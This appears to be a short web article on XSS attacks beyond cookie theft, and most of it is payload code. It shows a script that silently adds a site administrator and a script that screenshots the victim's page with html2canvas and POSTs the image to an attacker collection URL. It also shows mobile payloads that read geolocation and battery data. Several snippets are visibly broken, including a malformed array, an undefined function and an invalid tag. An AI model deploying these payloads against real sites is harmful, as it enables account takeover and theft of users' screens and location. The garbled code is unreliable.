Alternative Play XSS Attacks: Beyond Cookie Theft
In the realm of web application security, Cross-Site Scripting (XSS) vulnerabilities are a common and formidable threat. While many security professionals are familiar with the basics of XSS, they often focus on the most obvious attacks, such as stealing cookies or injecting malicious scripts. However, XSS attacks can be more sophisticated and nuanced, allowing attackers to gain administrator privileges, intercept user screens, and even target mobile devices.
1. XSS Attack: Adding an Administrator
One such attack involves using XSS to add an administrator to a website. This can be achieved even when the cookie is not accessible, making it a more challenging and insidious attack. By leveraging JavaScript and Ajax technology, an attacker can send a POST request in the background to add a new administrator.
var request = false;
if (window.XMLHttpRequest) {
request = new XMLHttpRequest();
if (request.overrideMimeType) {
request.overrideMimeType('text/html');
}
} else if (window.ActiveXObject) {
var versions = {
'Microsoft.XMLHTTP',
'MSXML_XMLHTTP',
'Microsoft.XMLHTTP',
'Msxml2.XMLHTTP.7.0',
'Msxml2.XMLHTTP.6.0',
'Msxml2.XMLHTTP.5.0',
'Msxml2.XMLHTTP.4.0',
'Msxml2.XMLHTTP.3.0',
'Msxml2.XMLHTTP'
};
for (var i = 0; i < versions.length; i++) {
try {
request = new ActiveXObject(versions[i]);
} catch (e) {
}
}
}
xmlhttp = request;
add_admin();
2. XSS Interception of Customer Screens
With the advancement of front-end technologies, XSS attacks can now be carried out using the Canvas HTML5 screenshot function, allowing attackers to remotely view and collect sensitive information from users’ screens. This can be achieved using the html2canvas.js library.
document.write('<script src="html2canvas.js"></script>');
window.onload = function() {
html2canvas(document.body, {
onrendered: function(canvas) {
// ...
var xhr = function() {
var request = false;
if (window.XMLHttpRequest) {
request = new XMLHttpRequest();
} else if (window.ActiveXObject) {
try {
request = new window.ActiveXObject('Microsoft.XMLHTTP');
} catch (e) {
}
}
return request;
}();
request = function(method, src, argv, content_type) {
xhr.open(method, src, false);
if (method == 'POST') xhr.setRequestHeader('Content-type', content_type);
xhr.send(argv);
return xhr.responseText;
};
attack_a = function() {
var src = "http://xxx.com/xss.php?"; // post receiving address
var argv_0 = "screenshot=" + canvas.toDataURL(); // post field names screenshot
request("POST", src, argv_0, "application/x-www-form-urlencoded");
};
attack_a();
}
});
};
3. XSS Mobile Terminal Attack
With the increasing popularity of mobile devices, XSS attacks can now target mobile terminals. One such attack involves using the navigator.geolocation.getCurrentPosition() function to obtain the user’s latitude and longitude.
<navigator.geolocation.getCurrentPosition(function(p) {
alert('Latitude:' + p.coords.latitude + ', Longitude:' + p.coords.longitude + ', Altitude:' + p.coords.altitude);
})</navigator>
Another attack involves using the JavaScript Battery API to obtain the user’s battery state.
<svg onload="alert(navigator.battery.level)"></svg>
<svg onload="alert(navigator.battery.dischargingTime)"></svg>
<svg onload="alert(navigator.battery.charging)"></svg>
By understanding and addressing these alternative XSS attacks, organizations can improve their web application security and protect their users from more sophisticated threats.